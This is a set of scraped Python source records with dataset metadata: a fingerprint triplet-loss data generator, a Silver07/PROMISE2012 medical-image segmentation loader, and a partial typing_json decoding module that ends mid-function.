20\n \n # All combinations of training data\n triplets_train, anchors_train = self.all_triplets_easy(breakpoints_train, self.train_rotation, self.train_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # All combinations of training data\n triplets_val, anchors_val= self.all_triplets_easy(breakpoints_val, self.val_rotation, self.val_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # All combinations of training data\n triplets_test, anchors_test= self.all_triplets_easy(breakpoints_test, self.test_rotation, self.test_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n\n self.triplets_train.extend(triplets_train)\n self.triplets_val.extend(triplets_val)\n self.triplets_test.extend(triplets_test)\n \n self.anchors_train = np.append(self.anchors_train,anchors_train,axis=0)\n self.anchors_val = np.append(self.anchors_val,anchors_val,axis=0)\n self.anchors_test = np.append(self.anchors_test,anchors_test,axis=0)\n \n # Save the original triplets\n self.triplets_train_original = self.triplets_train\n self.triplets_val_original = self.triplets_val\n self.triplets_test_original = self.triplets_test\n \n def gen_rotations(self,train_data,val_data,test_data,rotation_res):\n original_train_data = train_data\n original_val_data = val_data\n original_test_data = test_data\n no_rotations_exist = type(self.train_data) is np.ndarray\n \n if no_rotations_exist:\n self.train_data = [self.train_data]\n self.val_data = [self.val_data]\n self.test_data = [self.test_data]\n\n train_dims = np.shape(original_train_data)\n val_dims = np.shape(original_val_data)\n test_dims = np.shape(original_test_data)\n train_holder = tf.placeholder(tf.float32,shape=[train_dims[0],train_dims[1],train_dims[2],train_dims[3]])\n val_holder = tf.placeholder(tf.float32,shape=[val_dims[0],val_dims[1],val_dims[2],val_dims[3]])\n test_holder = tf.placeholder(tf.float32,shape=[test_dims[0],test_dims[1],test_dims[2],test_dims[3]])\n \n with tf.Session() as sess:\n 
if no_rotations_exist:\r\n                for i in range(1,rotation_res):\r\n                    angle = 2*math.pi/rotation_res*i\r\n                    rotated_train_images = sess.run(tf.contrib.image.rotate(train_holder,angle), feed_dict={train_holder:original_train_data})\r\n                    rotated_val_images = sess.run(tf.contrib.image.rotate(val_holder,angle), feed_dict={val_holder:original_val_data})\r\n                    rotated_test_images = sess.run(tf.contrib.image.rotate(test_holder,angle), feed_dict={test_holder:original_test_data})\r\n                    self.train_data.append(rotated_train_images)\r\n                    self.val_data.append(rotated_val_images)\r\n                    self.test_data.append(rotated_test_images)\r\n            else:\r\n                for i in range(1,rotation_res):\r\n                    angle = 2*math.pi/rotation_res*i\r\n                    rotated_train_images = sess.run(tf.contrib.image.rotate(train_holder,angle), feed_dict={train_holder:original_train_data})\r\n                    rotated_val_images = sess.run(tf.contrib.image.rotate(val_holder,angle), feed_dict={val_holder:original_val_data})\r\n                    rotated_test_images = sess.run(tf.contrib.image.rotate(test_holder,angle), feed_dict={test_holder:original_test_data})\r\n                    self.train_data[i] = np.append(self.train_data[i],rotated_train_images,axis=0)\r\n                    self.val_data[i] = np.append(self.val_data[i],rotated_val_images,axis=0)\r\n                    self.test_data[i] = np.append(self.test_data[i],rotated_test_images,axis=0)\r\n        \r\n    def get_breakpoints(self, person_id, finger_id):\r\n        breakpoints = []\r\n        idx_counter = 0\r\n        nbr_of_persons = person_id[-1]\r\n        for i in range(person_id[0], nbr_of_persons+1):\r\n            finger_counter = 0\r\n            while idx_counter < len(person_id):\r\n                if not i == person_id[idx_counter]:\r\n                    break\r\n                if not finger_counter == finger_id[idx_counter]:\r\n                    finger_counter = finger_id[idx_counter]\r\n                    breakpoints.append(idx_counter)\r\n                    \r\n                idx_counter += 1\r\n        \r\n        breakpoints.append(len(person_id))\r\n        \r\n        return breakpoints\r\n    \r\n    def get_triplet(self, data, triplets, anchors):\r\n        batch_size = len(anchors)\r\n        anchor_images = np.take(data,anchors,axis=0)\r\n        # Randomly draw a positive and a negative sample to the anchors\r\n        positive_index = np.zeros(batch_size,dtype='int32')\r\n        negative_index = np.zeros(batch_size,dtype='int32')\r\n        for i in range(batch_size):\r\n            anchor_triplet = triplets[anchors[i]]\r\n            nbr_non_matching = len(anchor_triplet[1])\r\n            positive_index[i] = anchor_triplet[0][np.random.randint(0,len(anchor_triplet[0]))] # Pick random matching fingerprint\r\n            negative_index[i] = anchor_triplet[1][np.random.randint(0,nbr_non_matching)] # Pick random non matching fingerprint\r\n        \r\n        positive_images = np.take(data, positive_index, axis=0)\r\n        negative_images = np.take(data, negative_index, axis=0)\r\n        \r\n        return anchor_images, positive_images, negative_images\r\n    \r\n    def get_images(self, data, image_list):\r\n        return np.take(data,image_list,axis=0)\r\n    \r\n    def is_rotation_similar(self,angle_1,angle_2,rotation_diff):\r\n        \"\"\" Checks if two angles differ by at most rotation_diff in absolute value.\r\n        \r\n        Input:\r\n        angle_1 - first angle, specified in degrees [0,360]\r\n        angle_2 - second angle, specified in degrees [0,360]\r\n        rotation_diff - difference in rotation\r\n        Returns: True if the angles differ by at most rotation_diff in absolute value,\r\n        otherwise False\r\n        \"\"\"\r\n        rot_cand_interval = np.zeros(2)\r\n        rot_match = False\r\n        if angle_2 - rotation_diff < 0:\r\n            rot_cand_interval[1] = angle_2 + rotation_diff\r\n            rot_cand_interval[0] = 360 + (angle_2 - rotation_diff)\r\n            if angle_1 < rot_cand_interval[1] or angle_1 > rot_cand_interval[0]:\r\n                rot_match = True\r\n        elif angle_2 + rotation_diff > 360:\r\n            rot_cand_interval[1] = angle_2 + rotation_diff - 360\r\n            rot_cand_interval[0] = angle_2 - rotation_diff\r\n            if angle_1 < rot_cand_interval[1] 
or angle_1 > rot_cand_interval[0]:\n rot_match = True\n else:\n rot_cand_interval[1] = angle_2 + rotation_diff\n rot_cand_interval[0] = angle_2 - rotation_diff\n if angle_1 < rot_cand_interval[1] or angle_1 > rot_cand_interval[0]:\n rot_match = True\n \n return rot_match\n \n def is_translation_similar(self,translation_1,translation_2, translation_diff):\n \"\"\" Checks if two 2D translations correspond to points that are close to each other.\n \n The translatios are assumed to be relative to a fixed point in 2D space.\n Input:\n translation_1 - first translation, specified as a numpy array of two elements (x,y)\n translation_2 - second translation, specified as a numpy array of two elements (x,y)\n translation_diff - maximum distance between the translations in each axis\n Returns: True if the distance between the translations is at most translation_diff in each axis,\n otherwise False\n \"\"\"\n translation_match = False\n dx = np.abs(translation_1[0] - translation_2[0])\n dy = np.abs(translation_1[1] - translation_2[1])\n \n if dx < translation_diff and dy < translation_diff:\n translation_match = True\n \n return translation_match\n \n def all_triplets_easy(self, breakpoints, rotation, translation, rotation_diff, translation_diff, margin_rot, margin_trans):\n triplets = []\n anchors = []\n \n for i in range(len(breakpoints) - 1):\n for k in range(breakpoints[i+1] - breakpoints[i]):\n match_to_anchor = []\n no_match_to_anchor = []\n template_trans = translation[breakpoints[i]+k]\n template_rot = rotation[breakpoints[i]+k]\n for j in range(breakpoints[i]+k+1, breakpoints[i+1]):\n rot_cand = rotation[j]\n trans_cand = translation[j]\n translation_match = False\n translation_margin = False\n rotation_match = self.is_rotation_similar(template_rot,rot_cand,rotation_diff)\n# rotation_margin = self.is_rotation_similar(template_rot,rot_cand,margin_rot)\n \n # if rotation is sufficiently similar check translation\n if rotation_match:\n translation_match = self.is_translation_similar(template_trans,trans_cand,translation_diff)\n# elif rotation_margin:\n# translation_margin = self.is_translation_similar(template_trans,trans_cand,margin_trans)\n translation_margin = self.is_translation_similar(template_trans,trans_cand,margin_trans)\n \n # if rotation and translation is similar the images related to the corresponding\n # breakpoint indices are considered similar\n if translation_match and rotation_match:\n match_to_anchor.append(j)\n# elif rotation_margin and translation_margin:\n# continue\n elif translation_margin:\n continue\n else:\n no_match_to_anchor.append(j)\n \n for n in range(breakpoints[0], breakpoints[i]):\n no_match_to_anchor.append(n)\n for n in range(breakpoints[i+1], rotation.shape[0]):\n no_match_to_anchor.append(n)\n \n match_to_anchor = np.array(match_to_anchor)\n no_match_to_anchor = np.array(no_match_to_anchor)\n \n triplets.append([match_to_anchor, no_match_to_anchor]) # Append the list of matches to the anchor\n \n if len(match_to_anchor) > 0:\n anchors.append(breakpoints[i] + k) # Add index of anchor\n \n return triplets, np.array(anchors)\n \n def update_triplets(self, hardest_neg, hardest_pos):\n for i in range(len(self.anchors_train)):\n self.triplets_train[self.anchors_train[i]] = [hardest_pos[i], hardest_neg[i]]\n \n def three_split_array(self,input_array,percentage):\n length = len(input_array)\n split_ind = [math.floor(length*percentage[0]), math.floor(length*percentage[0])+math.floor(length*percentage[1])]\n \n first_split = input_array[0:split_ind[0]+1]\n 
second_split = input_array[split_ind[0]+1:split_ind[1]+1]\n third_split = input_array[split_ind[1]+1:]\n return first_split,second_split,third_split\n \n def same_class(self, pairs, test = False):\n \"\"\"Finds which pairs belongs to the same class (same finger and person i.e. same fingerprint)\n Input:\n pairs - (N x 2) matrix with pairs on each row\n test - optinal boolean to be set if the class test is to be run on the test set\n Return:\n class_id - (N x 1) vector with 0 and 1. 1 corresponds to pairs within the same class\n \"\"\"\n nbr_of_pairs = pairs.shape[0]\n class_id = np.zeros((nbr_of_pairs, 1))\n \n if test:\n person_id = self.test_person_id\n finger_id = self.test_finger_id\n else:\n person_id = self.val_person_id\n finger_id = self.val_finger_id\n \n for i in range(nbr_of_pairs):\n first = [person_id[pairs[i,0]], finger_id[pairs[i,0]]]\n second = [person_id[pairs[i,1]], finger_id[pairs[i,1]]]\n if first == second:\n class_id[i] = 1 \n \n return class_id\n \n ","sub_path":"TripletLossFingerprint/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":18706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239570205","text":"import os\r\nimport sys\r\nimport cv2\r\nimport torch\r\nimport random\r\nimport subprocess\r\nimport numpy as np\r\nimport SimpleITK as sitk\r\nfrom os import listdir\r\nfrom os.path import isfile, join, splitext\r\nfrom skimage.exposure import equalize_adapthist\r\n# from .base import BaseDataset\r\nfrom tools.utils import create_exp_dir\r\nfrom tools.augmentations import smooth_images\r\nfrom tools.augmentations import *\r\nimport torch.utils.data as data\r\nimport torchvision\r\nimport torchvision.transforms.functional as tf\r\nimport pickle\r\n\r\ndef img_resize(imgs, img_rows, img_cols, equalize=True):\r\n\r\n new_imgs = np.zeros([len(imgs), img_rows, img_cols])\r\n for mm, img in enumerate(imgs):\r\n if equalize:\r\n img = equalize_adapthist(img, clip_limit=0.05)\r\n\r\n new_imgs[mm] = cv2.resize(img, (img_rows, img_cols), interpolation=cv2.INTER_NEAREST )\r\n\r\n return new_imgs\r\n\r\ndef silver07_data2array(base_path, foldchose, store_path,img_rows,img_cols):\r\n clahe = cv2.createCLAHE(clipLimit=0.05, tileGridSize=(int(img_rows / 8), int(img_cols / 8)))\r\n fileList = os.listdir(os.path.join(base_path, 'training-scans'))\r\n fileList = sorted((x for x in fileList if '.mhd' in x))\r\n val_list = foldchose\r\n train_list = list(set(range(1,21)) - set(val_list))\r\n count = 0\r\n for the_list in [train_list, val_list]:\r\n images = []\r\n masks = []\r\n filtered = [file for file in fileList for ff in the_list if str(ff).zfill(3) in file]\r\n for filename in filtered:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'training-scans', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n if 'seg' in filename.lower():\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=False)\r\n masks.append(imgs)\r\n print('{} segmentation done'.format(filename))\r\n else:\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n print('{} image done'.format(filename))\r\n # images: slices x w x h ==> total number x w x h\r\n images = np.concatenate(images, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = np.concatenate(masks, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = masks.astype(np.uint8)\r\n\r\n # Smooth images using CurvatureFlow\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n\r\n if count 
== 0: # no normalize\r\n mu = np.mean(images)\r\n sigma = np.std(images)\r\n images = (images - mu) / sigma\r\n np.save(os.path.join(store_path, 'image_train.npy'), images)\r\n np.save(os.path.join(store_path, 'label_train.npy'), masks)\r\n elif count == 1:\r\n images = (images - mu) / sigma\r\n np.save(os.path.join(store_path, 'image_val.npy'), images)\r\n np.save(os.path.join(store_path,'label_val.npy'), masks)\r\n count += 1\r\n fileList = os.listdir(os.path.join(base_path, 'test-scans'))\r\n fileList = sorted([x for x in fileList if '.mhd' in x])\r\n n_imgs = []\r\n images = []\r\n for filename in fileList:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'test-scans', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n n_imgs.append(len(imgs))\r\n\r\n images = np.concatenate(images, axis=0).reshape(-1, img_rows, img_cols)\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n images = (images - mu) / sigma\r\n\r\n np.save(os.path.join(store_path,'image_test.npy'), images)\r\n np.save(os.path.join(store_path, 'test_label_imgs.npy'), np.array(n_imgs)) # no label, label means the length of test images\r\n print('save file in {}'.format(store_path))\r\n\r\n\r\ndef data_to_array(base_path, store_path, img_rows, img_cols):\r\n\r\n clahe = cv2.createCLAHE(clipLimit=0.05, tileGridSize=(int(img_rows/8),int(img_cols/8)))\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TrainingData'))\r\n\r\n fileList = sorted((x for x in fileList if '.mhd' in x))\r\n\r\n val_list = [5, 15, 25, 35, 45]\r\n train_list = list(set(range(50)) - set(val_list) )\r\n count = 0\r\n for the_list in [train_list, val_list]:\r\n images = []\r\n masks = []\r\n\r\n filtered = [file for file in fileList for ff in the_list if str(ff).zfill(2) in file ]\r\n\r\n for filename in filtered:\r\n\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TrainingData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n\r\n if 'segm' in filename.lower():\r\n imgs= img_resize(imgs, img_rows, img_cols, equalize=False)\r\n masks.append( imgs )\r\n else:\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n\r\n # images: slices x w x h ==> total number x w x h\r\n images = np.concatenate(images , axis=0 ).reshape(-1, img_rows, img_cols)\r\n masks = np.concatenate(masks, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = masks.astype(np.uint8)\r\n\r\n # Smooth images using CurvatureFlow\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n\r\n if count==0: # no normalize\r\n mu = np.mean(images)\r\n sigma = np.std(images)\r\n images = (images - mu)/sigma\r\n\r\n #np.save(os.path.join(store_path, 'X_train.npy'), images)\r\n #np.save(os.path.join(store_path,'y_train.npy'), masks)\r\n elif count==1:\r\n images = (images - mu)/sigma\r\n #np.save(os.path.join(store_path, 'X_val.npy'), images)\r\n #np.save(os.path.join(store_path,'y_val.npy'), masks)\r\n count+=1\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TestData'))\r\n fileList = sorted([x for x in fileList if '.mhd' in x])\r\n n_imgs=[]\r\n images=[]\r\n for filename in fileList:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TestData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n n_imgs.append(len(imgs))\r\n\r\n images = np.concatenate(images , axis=0).reshape(-1, img_rows, 
img_cols)\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n images = (images - mu)/sigma\r\n\r\n #np.save(os.path.join(store_path,'X_test.npy'), images)\r\n #np.save(os.path.join(store_path, 'test_n_imgs.npy'), np.array(n_imgs))\r\n print('save file in {}'.format(store_path))\r\n\r\ndef only_train_data_to_array(base_path, store_path, img_rows, img_cols):\r\n\r\n clahe = cv2.createCLAHE(clipLimit=0.05, tileGridSize=(int(img_rows/8),int(img_cols/8)))\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TrainingData'))\r\n\r\n fileList = sorted((x for x in fileList if '.mhd' in x))\r\n\r\n train_list = list(set(range(50)))\r\n\r\n images = []\r\n masks = []\r\n\r\n filtered = [file for file in fileList for ff in train_list if str(ff).zfill(2) in file]\r\n\r\n for filename in filtered:\r\n\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TrainingData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n\r\n if 'segm' in filename.lower():\r\n imgs= img_resize(imgs, img_rows, img_cols, equalize=False)\r\n masks.append( imgs )\r\n else:\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n\r\n # images: slices x w x h ==> total number x w x h\r\n images = np.concatenate(images, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = np.concatenate(masks, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = masks.astype(np.uint8)\r\n\r\n # Smooth images using CurvatureFlow\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n\r\n mu = np.mean(images)\r\n sigma = np.std(images)\r\n images = (images - mu)/sigma\r\n np.save(os.path.join(store_path, 'X_train.npy'), images)\r\n np.save(os.path.join(store_path,'y_train.npy'), masks)\r\n\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TestData'))\r\n fileList = sorted([x for x in fileList if '.mhd' in x])\r\n n_imgs=[]\r\n images=[]\r\n for filename in fileList:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TestData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n n_imgs.append(len(imgs))\r\n\r\n images = np.concatenate(images , axis=0).reshape(-1, img_rows, img_cols)\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n images = (images - mu)/sigma\r\n\r\n np.save(os.path.join(store_path,'X_test.npy'), images)\r\n np.save(os.path.join(store_path, 'test_n_imgs.npy'), np.array(n_imgs))\r\n print('save file in {}'.format(store_path))\r\n\r\ndef load_train_data(store_path):\r\n\r\n X_train = np.load(os.path.join(store_path, 'image_train.npy'))\r\n y_train = np.load(os.path.join(store_path, 'label_train.npy'))\r\n\r\n return X_train, y_train\r\n\r\ndef load_val_data(store_path):\r\n\r\n X_val = np.load(os.path.join(store_path, 'image_val.npy'))\r\n y_val = np.load(os.path.join(store_path, 'label_val.npy'))\r\n return X_val, y_val\r\n\r\ndef load_test_data(store_path):\r\n X_test = np.load(os.path.join(store_path, 'image_test.npy'))\r\n x_slice_array = np.load(os.path.join(store_path, 'test_label_imgs.npy'))\r\n return X_test, x_slice_array\r\n\r\ndef get_test_list(base_path):\r\n fileList = os.listdir(os.path.join(base_path, 'test-scans'))\r\n fileList = sorted([os.path.join(base_path, 'test-scans',x) for x in fileList if '.mhd' in x])\r\n return fileList\r\n\r\n# ce+dice:0.9098(dice)/0.8346(miou)\r\n\r\nclass Silver07(data.Dataset):\r\n # IN_CHANNELS = 1\r\n # BASE_DIR = 'PROMISE2012'\r\n # TRAIN_IMAGE_DIR = 
'TrainingData'\r\n # VAL_IMAGE_DIR = 'TestData'\r\n # NUM_CLASS = 1\r\n # CROP_SIZE = 256\r\n # CLASS_WEIGHTS = None\r\n\r\n def __init__(self, root, mode):\r\n super(Silver07, self).__init__()\r\n self.mode = mode\r\n #self.joint_transform = joint_transform\r\n # root = root + '/' + self.BASE_DIR\r\n self.joint_transform_train = Compose([\r\n RandomHorizontallyFlip(),\r\n RandomElasticTransform(alpha=1.5, sigma=0.07, img_type='F'),\r\n ])\r\n # self.joint_transform_valid = Compose([\r\n # CenterCrop(size=192),\r\n # ])\r\n # RandomTranslate(offset=(0.2, 0.1)),\r\n # RandomVerticallyFlip(),\r\n self.RET = RandomElasticTransform(alpha=1.5, sigma=0.07, img_type='F')\r\n self.transform_image = torchvision.transforms.Compose([\r\n #torchvision.transforms.RandomVerticalFlip(),\r\n #torchvision.transforms.RandomHorizontalFlip(),\r\n RandomElasticTransform_image(alpha = 1.5, sigma = 0.07, img_type='F'),\r\n ])\r\n self.transform_mask = torchvision.transforms.Compose([\r\n #torchvision.transforms.RandomVerticalFlip(),\r\n #torchvision.transforms.RandomHorizontalFlip(),\r\n RandomElasticTransform_mask(alpha = 1.5, sigma = 0.07, img_type='F'),\r\n ])\r\n\r\n self.img_normalize = None\r\n # fold0 = ['Case08', 'Case12', 'Case21', 'Case22', 'Case30', 'Case32', 'Case33', 'Case38', 'Case42', 'Case45']\r\n # fold1 = ['Case00', 'Case01', 'Case07', 'Case13', 'Case15', 'Case23', 'Case24', 'Case34', 'Case40', 'Case46']\r\n # fold2 = ['Case02', 'Case05', 'Case09', 'Case17', 'Case18', 'Case25', 'Case28', 'Case35', 'Case39', 'Case44']\r\n # fold3 = ['Case03', 'Case06', 'Case10', 'Case14', 'Case19', 'Case26', 'Case29', 'Case36', 'Case41', 'Case47']\r\n # fold4 = ['Case04', 'Case11', 'Case16', 'Case20', 'Case27', 'Case31', 'Case37', 'Case43', 'Case48', 'Case49']\r\n fold0 = [6,7,12,19]\r\n fold1 = [1,5,11,17]\r\n fold2 = [2,9,13,15]\r\n fold3 = [3,8,14,18]\r\n fold4 = [4,10,16,20]\r\n # SECOND\r\n # store data in the npy file\r\n data_path = os.path.join(root, 'Silver07_npy_fold0')\r\n\r\n if not os.path.exists(data_path):\r\n create_exp_dir(data_path)\r\n silver07_data2array(root, fold0, data_path, 256, 256)\r\n else:\r\n print('read the data from: {}'.format(data_path))\r\n\r\n self.test_file_list = get_test_list(root)\r\n self.blank_layer = []\r\n # read the data from npy\r\n if mode == 'train':\r\n self.X_train, self.y_train = load_train_data(data_path)\r\n # self.size = self.X_train.shape[0]\r\n # for i in range(self.X_train.shape[0]):\r\n # if np.sum(self.y_train[i,:,:]) == 0:\r\n # self.blank_layer.append(i)\r\n # self.blank_layer.reverse()\r\n # with open(r'E:\\CodeRepo\\myUnet\\Silver07_blank.pkl', 'wb') as f:\r\n # pickle.dump(self.blank_layer, f)\r\n\r\n\r\n\r\n with open('/hdd1/wyn/DenseNAS/run_apis/Silver07_blank.pkl', 'rb') as f:\r\n a = pickle.load(f)\r\n self.X_train_no_blank = self.X_train\r\n self.y_train_no_blank = self.y_train\r\n for j in a:\r\n if random.random() < 0.8:\r\n self.X_train_no_blank = np.delete(self.X_train_no_blank, j, 0)\r\n self.y_train_no_blank = np.delete(self.y_train_no_blank, j, 0)\r\n print('blank layer % its size', len(a))\r\n # self.size = self.X_train.shape[0]\r\n img_aug = Image.fromarray(self.X_train_no_blank[0], mode='F')\r\n target_aug = Image.fromarray(self.y_train_no_blank[0], mode='L')\r\n img2, target2 = self.joint_transform_train(img_aug, target_aug)\r\n img2 = np.array(img2)\r\n target2 = np.array(target2)\r\n img_aug_arr = np.expand_dims(img2, 0)\r\n target_aug_arr = np.expand_dims(target2, 0)\r\n for im in range(1, self.X_train_no_blank.shape[0]):\r\n 
img_aug = Image.fromarray(self.X_train_no_blank[im], mode='F')\r\n target_aug = Image.fromarray(self.y_train_no_blank[im], mode='L')\r\n img2, target2 = self.joint_transform_train(img_aug, target_aug)\r\n img2 = np.array(img2)\r\n img2 = np.expand_dims(img2, 0)\r\n target2 = np.array(target2)\r\n target2 = np.expand_dims(target2, 0)\r\n img_aug_arr = np.concatenate((img_aug_arr, img2), axis=0)\r\n target_aug_arr = np.concatenate((target_aug_arr, target2), axis=0)\r\n # self.X_train = np.concatenate((self.X_train, img_aug_arr), axis=0)\r\n # self.y_train = np.concatenate((self.y_train, target_aug_arr), axis=0)\r\n self.X_train = img_aug_arr\r\n self.y_train = target_aug_arr\r\n # self.y_train = np.array(self.y_train == 1).astypy('int64')\r\n self.size = self.X_train.shape[0]\r\n print('train set size is: ',self.size)\r\n elif mode == 'val':\r\n self.X_val, self.y_val = load_val_data(data_path)\r\n self.size = self.X_val.shape[0]\r\n elif mode == 'test':\r\n self.X_test, self.x_slice_array = load_test_data(data_path)\r\n self.size = self.X_test.shape[0]\r\n\r\n def __getitem__(self, index):\r\n # 1. the image already crop\r\n if self.mode == \"train\":\r\n img, target = self.X_train[index], self.y_train[index]\r\n elif self.mode == 'val':\r\n img, target = self.X_val[index], self.y_val[index]\r\n #img, target = self.X_val[index], self.validfilelist\r\n elif self.mode == 'test': # the test target indicate the number of slice for each case\r\n img, target = self.X_test[index], self.test_file_list\r\n img = Image.fromarray(img, mode='F')\r\n #target = np.array(target, dtype=np.float32)\r\n\r\n if self.mode == 'train':\r\n target = Image.fromarray(target, mode='L')\r\n # 2. do joint transform\r\n if self.joint_transform_train is not None:\r\n # img, target = self.joint_transform(img, target)\r\n img = np.array(img)\r\n target = np.array(target)\r\n # 3. to tensor\r\n img = torch.from_numpy(img)\r\n target = torch.from_numpy(target)\r\n elif self.mode == 'val':\r\n # target = Image.fromarray(target, mode='L')\r\n target = Image.fromarray(target, mode='L')\r\n # img,target = self.joint_transform_valid(img, target)\r\n img = np.array(img)\r\n target = np.array(target)\r\n img = torch.from_numpy(img)\r\n target = torch.from_numpy(target)\r\n else:\r\n # 3. img to tensor\r\n # img = tf.to_tensor(img)\r\n img = torch.from_numpy(img)\r\n\r\n\r\n img = img.type(torch.FloatTensor)\r\n target = target.type(torch.FloatTensor)\r\n # 4. 
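# Sketch of the numpy -> torch hand-off this __getitem__ relies on, assuming
# torch and numpy: torch.from_numpy shares memory with the source array, so
# the explicit .float() cast is what yields an independent float32 tensor
# that is safe to feed to the model.
import numpy as np
import torch

def to_float_tensor(arr):
    # ascontiguousarray guards against negative-stride views (e.g. flips)
    return torch.from_numpy(np.ascontiguousarray(arr)).float()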
normalize for img\r\n if self.img_normalize != None:\r\n img = self.img_normalize(img)\r\n\r\n return img, target\r\n\r\n def __len__(self):\r\n return self.size\r\n\r\nimport torch.utils.data as data\r\n\r\n# if __name__ == '__main__':\r\n# root = r'E:\\anyDataset\\PROMISE2012'\r\n# data_path = r'E:\\anyDataset\\PROMISE2012\\npy_image'\r\n# CROP_SIZE = 256\r\n# data_to_array(root, data_path, CROP_SIZE, CROP_SIZE)\r\n","sub_path":"dataset/sliver07_dataset.py","file_name":"sliver07_dataset.py","file_ext":"py","file_size_in_byte":17476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237517813","text":"\"\"\" Decoding utilities \"\"\"\n\nfrom typing import Any, Union\nfrom collections import deque, OrderedDict\nfrom collections.abc import Mapping\nfrom typing_extensions import Literal\nfrom typing_json.typechecking import is_instance, is_namedtuple\nfrom typing_json.encoding import JSON_BASE_TYPES, is_json_encodable\n\n_UNREACHABLE_ERROR_MSG = \"Should never reach this point, please open an issue on GitHub.\"\n\ndef from_json_obj(obj: Any, t: Any) -> Any:\n \"\"\" Converts an object of json standard type to json encodable type. \"\"\"\n # pylint:disable=invalid-name,too-many-branches,too-many-statements,too-many-return-statements\n if not is_json_encodable(t):\n raise TypeError(\"Type %s is not json-encodable.\"%str(t))\n if t in JSON_BASE_TYPES:\n if not isinstance(obj, t):\n raise TypeError(\"Object %s is not %s.\"%(str(obj), str(t)))\n return obj\n if t in (None, type(None)):\n if obj is not None:\n raise TypeError(\"Object %s is not null (t=%s).\"%(str(obj), str(t)))\n return None\n if t is ...:\n if obj is not None:\n raise TypeError(\"Object %s is not null (t=%s).\"%(str(obj), str(t)))\n return ...\n if is_namedtuple(t):\n if not isinstance(obj, (dict, OrderedDict, list)):\n raise TypeError(\"Object %s is not (ordered) dictionary or list (t=%s).\"%(str(obj), str(t))) # pylint:disable=line-too-long\n fields = getattr(t, \"_fields\")\n field_types = getattr(t, \"_field_types\")\n field_defaults = getattr(t, \"_field_defaults\")\n if isinstance(obj, list):\n if len(fields) != len(obj):\n raise TypeError(\"Object %s does not provide the right number of values for a namedtuple.\")\n return_val = t(*tuple(from_json_obj(obj[i] if i < len(obj) else field_defaults[field], field_types[field]) for i, field in enumerate(fields))) # pylint:disable=line-too-long\n assert is_instance(return_val, t)\n return return_val\n converted_dict: OrderedDict() = {} # type:ignore\n if set(obj.keys()).union(set(field_defaults.keys())) != set(field_types.keys()):\n key_diff = set(obj.keys()).union(set(field_defaults.keys())) - set(field_types.keys())\n if key_diff:\n raise TypeError(\"Object %s does not have the required keys: t=%s, extra keys %s.\"%(str(obj), str(t), str(key_diff))) # pylint:disable=line-too-long\n key_diff = set(field_types.keys()) - set(obj.keys()).union(set(field_defaults.keys()))\n raise TypeError(\"Object %s does not have the required keys: t=%s, missing keys %s.\"%(str(obj), str(t), str(key_diff))) # pylint:disable=line-too-long\n for field in fields:\n field_type = field_types[field]\n if not field in obj:\n converted_dict[field] = field_defaults[field]\n else:\n converted_dict[field] = from_json_obj(obj[field], field_type)\n return_val = t(**converted_dict)\n assert is_instance(return_val, t)\n return return_val\n if hasattr(t, \"__origin__\") and hasattr(t, \"__args__\"): # generics\n if t.__origin__ is Union:\n for s in 
t.__args__:\n try:\n return_val = from_json_obj(obj, s)\n assert is_instance(return_val, t)\n return return_val\n except TypeError:\n continue\n raise TypeError(\"Object %s is not convertible to any of %s.\"%(str(obj), str(t)))\n if t.__origin__ is Literal:\n if not is_instance(obj, t):\n raise TypeError(\"Object %s is not allowed (t=%s).\"%(str(obj), str(t)))\n return obj\n if t.__origin__ is list:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n return_val = list(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is deque:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n return_val = deque(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is set:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n 